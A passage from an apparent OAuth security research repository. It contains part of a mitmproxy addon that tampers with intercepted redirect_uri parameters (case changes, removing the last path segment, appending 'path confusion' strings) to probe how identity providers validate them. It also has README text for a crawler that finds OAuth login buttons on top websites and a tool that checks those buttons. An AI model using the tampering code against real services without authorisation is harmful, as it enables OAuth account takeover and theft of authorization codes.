166 | up=ret[t:].upper()
167 | print(f'upper string:{up}',file=sys.stdout)
168 | new=ret[:t]+up
169 | print(f'temp string modified with replace: {new}', file=sys.stdout)
170 | temp=flow.request.url
171 | bb=temp.replace(ret,new)
172 | flow.request.url=bb
173 | return
174 | else:
175 | print(f'word shorter ({len(ret)-cut} chars) than the requested modification length {mod}',file=sys.stdout)
176 | return
177 | elif("rm" in ctx.options.inject and "lw" in ctx.options.inject):
178 | #modify last word of redirect uri
179 | b=flow.request.url.find("redirect_uri")
180 | f=flow.request.url.find("&",b)
181 | if(f>0):
182 | ret=flow.request.url[b+13:f]
183 | else:
184 | ret=flow.request.url[b+13:]
185 | #search / or %2f from end of redirect_uri
186 | cut=ret.rfind("/")
187 | if(cut<0):
188 | encut=ret.rfind('%2f')
189 | if(encut<0):
190 | encut=ret.rfind('%2F')
191 | if(encut<0):
192 | print("not able to find / or %2f",file=sys.stdout)
193 | return
194 | #remove last word
195 | print(f'ret string:{ret} len: {len(ret)}',file=sys.stdout)
196 | if(cut<0):
197 | print(f'found separator at position {encut} string from cut on {ret[encut:]} before cut {ret[:encut]}')
198 | else:
199 | print(f'found separator at position {cut} string from cut on {ret[cut:]} before cut {ret[:cut]}')
200 |
201 | if(cut<0):
202 | #encoded separator (%2f/%2F) found: truncate before it
203 | new=ret[:encut]
204 | else:
205 | #plain / found: truncate before it
206 | new=ret[:cut]
207 |
208 | temp=flow.request.url
209 | bb=temp.replace(ret,new)
210 | flow.request.url=bb
211 | print(f'temp string modified with replace: {new}', file=sys.stdout)
212 | print(f'new temporary url: {flow.request.url}', file=sys.stdout)
213 |
214 | if(not multi_cmd):return
215 | else:second=ctx.options.inject.split("+")[1]
216 |
217 | print("last word removed, now attaching the path confusion string",file=sys.stdout)
218 | print("attach pathconfusion",file=sys.stdout)
219 |
220 | b=flow.request.url.find("redirect_uri")
221 | f=flow.request.url.find("&",b)
222 |
223 | if(f>0):
224 | #find next param or end of string
225 | print(f'f greater than 0 so internal param', file=sys.stdout)
226 | ret=flow.request.url[b+13:f]
227 | else:
228 | ret=flow.request.url[b+13:]
229 | print(f'extracted redirect uri: {ret}', file=sys.stdout)
230 |
231 | #use urllib to concatenate the path confusion string
232 | test1=urllib.parse.unquote(ret)
233 | print(f'test url unquoted: {test1}', file=sys.stdout)
234 | test=urlparse(test1)
235 | testpath=test.path
236 | print(f'test path extracted: {testpath}', file=sys.stdout)
237 | print(f'used second as inject string: {second}',file=sys.stdout)
238 | newpath=testpath+second
239 | print(f'new path generated: {newpath}', file=sys.stdout)
240 | newurl=test._replace(path=newpath).geturl()
241 | print(f'new url generated(unquoted): {newurl}', file=sys.stdout)
242 | quotedurl=urllib.parse.quote(newurl, safe='')
243 | print(f'new url generated(quoted): {quotedurl}', file=sys.stdout)
244 |
245 | temp=flow.request.url
246 | print(f'temp string: {temp}', file=sys.stdout)
247 | new=temp.replace(ret,quotedurl)
248 | print(f'temp string modified with replace: {new}', file=sys.stdout)
249 | flow.request.url=new
250 |
251 | else:
252 | print("only attach the pathconfusion string",file=sys.stdout)
253 |
254 | b=flow.request.url.find("redirect_uri")
255 | f=flow.request.url.find("&",b)
256 | g=flow.request.url.find('%3F',b)
257 |
258 | if(f<g or g<0):
259 | #& appears before %3F (or %3F is absent): extract redirect_uri as usual
260 | if(f>0):
261 | #find next param or end of string
262 | print(f'f greater than 0 so internal param', file=sys.stdout)
263 | ret=flow.request.url[b+13:f]
264 | else:
265 | ret=flow.request.url[b+13:]
266 | else:
267 | print(f'in this case %3F is present and it is before & pos%3F:{g} pos&:{f}', file=sys.stdout)
268 | print(f'g greater than 0 so internal param', file=sys.stdout)
269 | ret=flow.request.url[b+13:g]
270 |
271 |
272 | print(f'extracted redirect uri: {ret}', file=sys.stdout)
273 | #use urllib to concatenate the path confusion string
274 | #test1=urllib.parse.unquote(ret)
275 | test1=ret
276 | print(f'redirect_uri used as-is (not unquoted): {test1}', file=sys.stdout)
277 | test=urlparse(test1)
278 | testpath=test.path
279 | print(f'test path extracted: {testpath}', file=sys.stdout)
280 | newpath=testpath+ctx.options.inject
281 | print(f'new path generated: {newpath}', file=sys.stdout)
282 | newurl=test._replace(path=newpath).geturl()
283 | print(f'new url generated used for injection(unquoted): {newurl}', file=sys.stdout)
284 | quotedurl=urllib.parse.quote(newurl, safe='')
285 | print(f'new url generated(quoted): {quotedurl}', file=sys.stdout)
286 |
287 | temp=flow.request.url
288 | print(f'temp string: {temp}', file=sys.stdout)
289 |
290 | new=temp.replace(ret,newurl)
291 | print(f'temp string modified with replace: {new}', file=sys.stdout)
292 | flow.request.url=new
293 |
294 |
295 | addons = [
296 | PathConfString()
297 | ]
298 |
299 |
300 |
301 |
302 |
303 |
304 |
305 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # IdPs Identification
2 |
3 | Crawls a list of websites to search for the OAuth IdPs they use.
4 |
5 | ## How does it work
6 |
7 | On a high level, the script does the following:
8 |
9 | 1. Visit the homepage of the site
10 | 2. If the homepage does not contain login functionality:
11 | 1. Crawl the site to find the login page.
12 | 3. Search for the OAuth URLs and buttons on the login page.
13 |
14 | ### Login pages identification
15 |
16 | To detect a login page, the script looks for the following (a minimal sketch follows the list):
17 |
18 | - Searches for links that contain some keywords (e.g., `/signin`, `/login`).
19 | - Checks if the current page contains an input field of type `password`.
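
The sketch below illustrates these two checks with BeautifulSoup. It is an assumption-laden simplification: the keyword list is only an example and the real logic in `idps-identification.py` is more involved.

```python
# Illustrative sketch of the login-page heuristics above; the real keyword
# set used by the crawler is larger and combined with denylists.
from bs4 import BeautifulSoup

LOGIN_KEYWORDS = ['/signin', '/login', 'sign-in', 'log-in']  # assumed subset

def has_password_field(html):
    # A password input is a strong signal that the page is a login page.
    soup = BeautifulSoup(html, 'html.parser')
    return soup.find('input', attrs={'type': 'password'}) is not None

def candidate_login_links(html):
    # Collect links whose href contains one of the login keywords.
    soup = BeautifulSoup(html, 'html.parser')
    return [a['href'] for a in soup.find_all('a', href=True)
            if any(k in a['href'].lower() for k in LOGIN_KEYWORDS)]
```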
20 |
21 | ### OAuth URLs and buttons identification
22 |
23 | To detect the OAuth URLs and buttons, the script looks for the following:
24 |
25 | For each **provider**:
26 |
27 | - Searches for links containing the **provider** name and some keywords (e.g., `auth`, `login`, `signin`).
28 | - Searches for specific HTML tags (`a`, `input`, and `button`) that contain the **provider** name and some keywords (e.g., `auth`, `login`, `signin`).
29 | - If no such tag is found, it optionally searches through all the other HTML tags, as sketched below.
30 |
31 | **Note**: the script makes heavy use of **denylists** to avoid false positives. The denylists are compiled by observing the results of the script while debugging and are not exhaustive.
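
As a rough illustration of the matching and denylist filtering described above (the keyword and denylist values here are placeholders, not necessarily the ones the script actually uses):

```python
from bs4 import BeautifulSoup

OAUTH_KEYWORDS = ['auth', 'login', 'signin']   # illustrative
DENYLIST = ['blog', 'help', 'policy']          # illustrative

def oauth_candidates(html, provider):
    soup = BeautifulSoup(html, 'html.parser')
    candidates = []
    for tag in soup.find_all(['a', 'button', 'input']):
        # Consider the visible text plus common attributes of the tag.
        blob = ' '.join([tag.get_text(' ', strip=True),
                         tag.get('href', '') or '',
                         tag.get('onclick', '') or '']).lower()
        if provider in blob and any(k in blob for k in OAUTH_KEYWORDS) \
                and not any(d in blob for d in DENYLIST):
            candidates.append(tag)
    return candidates
```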
32 |
33 | ## How to run it
34 |
35 | - Install the dependencies: `pip install -r requirements.txt`
36 |
37 | ### On a single website
38 |
39 | Run the script: `python3 idps-identification.py -t <target site>`
40 |
41 | E.g.:
42 | `python3 idps-identification.py -t imdb.com`
43 | `python3 idps-identification.py -t medium.com`
44 |
45 | #### Script arguments
46 |
47 | ```bash
48 | -h, --help show this help message and exit
49 | -t TARGET, --target TARGET
50 | Target website
51 | -S STATS, --stats STATS
52 | Statistics folder
53 | -R REPORTS, --reports REPORTS
54 | Reports folder
55 | -l LOGS, --logs LOGS Logs folder
56 | -L LINKS, --links LINKS
57 | File containing the login links
58 | -m MAX, --max MAX Maximum number of URLs to crawl (Default: 10)
59 | -N, --no-headless Do not use a headless browser
60 | -r, --retest Retest the URLs
61 | ```
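
For instance, to crawl more pages and watch the browser, the flags above can be combined as in `python3 idps-identification.py -t imdb.com -m 20 -N`.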
62 |
63 | ### On a list of websites
64 |
65 | 1) Obtain the list of sites:
66 | On the Tranco site, it is possible to download the most recent list of the Top 1 million websites: <https://tranco-list.eu>. The script expects a list of sites in the Tranco list format; a slice of the list (e.g., the first 30 sites) can also be provided to the script.
67 |
68 | 2) Run the script: `python3 launcher.py --sites <sites file>`
69 |
70 | The launcher will test the websites in the file concurrently (up to the maximum number of concurrent tests).
71 |
72 | #### Launcher arguments
73 |
74 | ```bash
75 | -h, --help show this help message and exit
76 | -s SITES, --sites SITES
77 | Sites list
78 | -m MAX, --max MAX Maximum number of sites to test concurrently (default: 5)
79 | -a ARGUMENTS, --arguments ARGUMENTS
80 | Additional arguments to pass to the crawler (use with = sign: -a="--arg1 --arg2")
81 | -t, --testall Test also already tested sites
82 | -c CRAWLER, --crawler CRAWLER
83 | Alternative crawler script name to launch
84 | -d, --debug Enable debug mode
85 | ```
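
For example, assuming a Tranco-style file named `tranco-top-1000.csv` (hypothetical name): `python3 launcher.py --sites tranco-top-1000.csv -m 10 -a="--no-headless"`.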
86 |
87 | ### Workflow
88 |
89 | The structure of the output JSON file of the `idps-identification.py` script differs from the one needed for the next step, **OAuth trigger validation**; therefore, we need to convert the JSON file to the correct format. To do so, we use the `convert.sh` script with the same list of sites used before to identify the OAuth triggers.
90 |
91 | Run the script: `./convert.sh <sites file>`
92 |
93 | The sites file provided to the `convert.sh` script should follow the same CSV format as the Tranco list.
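
That is, a plain CSV with one `rank,domain` pair per line, for example (domains illustrative):

```
1,google.com
2,youtube.com
3,facebook.com
```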
94 |
95 | The script:
96 |
97 | 1. Calls `generate-sites-files.py` to generate one JSON file per site, with the structure needed by the next step.
98 |
99 | 2. Calls `merge-sites-files.py` to merge the per-site JSON files into a single one (`json/sites.json`).
100 |
101 | ## Notice
102 |
103 | The script has a high false-positive rate. In our research, this was not a problem, since this was only the first step: in the next one, we used an automated browser to click on the buttons detected by this script and check whether they are actually OAuth buttons. In this script, we prioritized not missing any OAuth button, even at the cost of many false positives. Improving the denylists to reduce the false-positive rate is recommended if this script is used for other purposes.
104 |
105 |
106 | # OAuth trigger validation
107 |
108 | Receives a list of the sites' login pages and exercises the OAuth buttons identified in the previous step to verify that they can initiate an OAuth flow.
109 | The results are the list of the evaluated OAuth triggers per site (Verified_Sites.json) and the list of top IdPs (Top_Idps.json).
110 |
111 | ## How does it work
112 |
113 | On a high level, the script does the following:
114 |
115 | 1) Visits the login page of the site and exercises, one by one, the OAuth triggers identified previously
116 | 2) Looks for changes in the browser, such as a new tab opening or a change of the page URL
117 | 3) If a change occurs, evaluates the landing page, searching for login-page identifiers such as the presence of a login button and OAuth identifiers in the page URL (see the sketch below)
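
The sketch below illustrates this check in Python with Selenium; the actual implementation lives in `verifysites.js` and uses Puppeteer, so the selectors, waits, and heuristics here are only an approximation.

```python
# Approximate illustration (Selenium) of the check performed by verifysites.js.
import time
from selenium import webdriver
from selenium.webdriver.common.by import By

def exercise_trigger(driver, css_selector):
    before_url = driver.current_url
    before_tabs = set(driver.window_handles)

    driver.find_element(By.CSS_SELECTOR, css_selector).click()
    time.sleep(5)  # crude wait for a redirect or a new tab to appear

    new_tabs = set(driver.window_handles) - before_tabs
    if new_tabs:
        driver.switch_to.window(new_tabs.pop())

    landed = driver.current_url
    # Heuristic: an OAuth authorization URL typically carries these parameters.
    return landed != before_url and ('client_id' in landed or 'redirect_uri' in landed)
```

A trigger is considered verified only when, in addition to the URL change, the landing page also shows login-page identifiers, as described in step 3.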
118 |
119 | Output:
120 | The output folder contains a series of files with the results for each error type. In the script folder, the file Verified_Sites.json will include the sites' login pages whose OAuth triggers work correctly, and the file Top_Idps.json will contain the list of the most used IdPs among the inspected sites.
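
Each entry written to Top_Idps.json has the shape below (provider and site names are illustrative):

```json
{"idp": "google", "sites": ["example.com", "example.org", "example.net", "example.edu"]}
```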
121 |
122 | ## How to run it
123 |
124 | 1) Install NodeJS from https://nodejs.org/en/download/.
125 | Then, run the following command to install all the dependencies:
126 |
127 | `npm install chrome-launcher chrome-remote-interface url-parse until tldjs path argparse puppeteer fs`
128 |
129 | Adjust the Chrome executable path at line 81 of verifysites.js to point to your Chrome executable.
130 | Run the script: `python3 Start-SitesVerification.py